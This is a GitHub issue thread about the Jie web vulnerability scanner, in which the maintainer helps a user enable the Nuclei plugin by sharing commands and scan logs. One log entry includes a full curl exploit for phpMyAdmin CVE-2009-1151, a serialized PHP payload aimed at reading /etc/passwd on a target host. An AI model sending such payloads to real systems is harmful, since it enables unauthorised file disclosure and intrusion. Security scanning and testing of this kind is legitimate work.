yhy0 / Jie

Jie stands out as a comprehensive security assessment and exploitation tool meticulously crafted for web applications. Its robust suite of features encompasses vulnerability scanning, information gathering, and exploitation, elevating it to an indispensable toolkit for both security professionals and penetration testers. 挖洞辅助工具(漏洞扫描、信息收集)

Home Page:https://jie.fireline.fun/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Nuclei

whlpentest opened this issue · comments

commented

The Nuclei plugin PerServer is not called and applied.

commented

Please check whether the nuclei plugin is specified to be enabled

commented

yes, already enabled

commented

Can you give details of the running commands and logs? Everything's fine here.

commented

./Jie web --listen 0.0.0.0:9080 --poc ~/nuclei-templates/http/cves/ --craw k -p nuclei

  • Log
[2024-05-20 14:03:45]  INFO [conf:file.go(Init):272] Load profile Jie_config.yaml
[2024-05-20 14:03:45]  INFO [cmd:webscan.go(init):51] Plugins: nuclei
[2024-05-20 14:03:45]  INFO [SCopilot:web.go(Init):82] Start SCopilot web service at :9088
[2024-05-20 14:03:53]  INFO [conf:file.go(Init):272] Load profile Jie_config.yaml
[2024-05-20 14:03:53]  INFO [SCopilot:web.go(Init):82] Start SCopilot web service at :9088
[2024-05-20 14:03:58] ERROR [cmdinject:cmdinject.go((*Plugin)):46] https://google-ohttp-relay-safebrowsing.fastly-edge.com/ exec function strings.Split fail
[2024-05-20 14:03:58] ERROR [util:parameter.go(ExtractParameters):41] https://google-ohttp-relay-safebrowsing.fastly-edge.com/ invalid semicolon separator in query
[2024-05-20 14:04:00] ERROR [reverse:dig_pm.go(GetSubDomain):36] Post "/get_sub_domain": unsupported protocol scheme ""
[2024-05-20 14:04:00]  INFO [sensitive:error.go(PageErrorMessageCheck):121] Sensitive: https://vulwebtest.local/?id=1 Java .java:482
[2024-05-20 14:04:00]  INFO [output:output.go(Write):61] �[31m
�[31m[Vuln: Sensitive error]
�[0m�[31m  Level: Low
�[0m�[31m  Target: https://vulwebtest.local/?id=1
�[0m�[31m  VulnType: \.java:[0-9]+
�[0m�[31m  Payload: .java:482
�[0m�[0m
commented

I downloaded it from here, and everything was running fine.

./Jie web --listen 0.0.0.0:9081 --poc ~/nuclei-templates/http/cves/ --craw k -p nuclei

     ██╗██╗███████╗
     ██║██║██╔════╝
     ██║██║█████╗
██   ██║██║██╔══╝
╚█████╔╝██║███████╗
 ╚════╝ ╚═╝╚══════╝

		v1.1.1
	https://github.com/yhy0/Jie

Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.

[2024-05-21 23:53:50]  INFO [conf:file.go(Init):270] Jie_config.yaml not find, Generate profile.
[2024-05-21 23:53:50]  INFO [cmd:webscan.go(init):51] Plugins: nuclei
[2024-05-21 23:53:50]  INFO [cmd:webscan.go(init):70] Security Copilot web report authorized:yhy/HDLucCDfDO
[2024-05-21 23:53:50]  INFO [SCopilot:web.go(Init):82] Start SCopilot web service at :9088
INFO[0002] Proxy start listen at 0.0.0.0:9081
[INF] Templates clustered: 19 (Reduced 12 Requests)
A total of 2 tasks have been received, 1 have been processed, and the processing rate is 50.00%
[2024-05-21 23:54:00]  INFO [output:output.go(Write):61]
[Vuln: POC]
  Level: High
  Target: https://yarx.koalr.me
  Ip: 198.18.0.7
  Payload: CVE-2009-1151
  CURLCommand: curl -X 'POST' -d 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}' -H 'Accept: */*' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: yarx.koalr.me' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' 'https://yarx.koalr.me/scripts/setup.php'
  Description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.

[INF] Using Interactsh Server: oast.fun

You can see that the nuclei file has been loaded

[INF] Templates clustered: 19 (Reduced 12 Requests)
commented

Oh man that's work great, Thank you.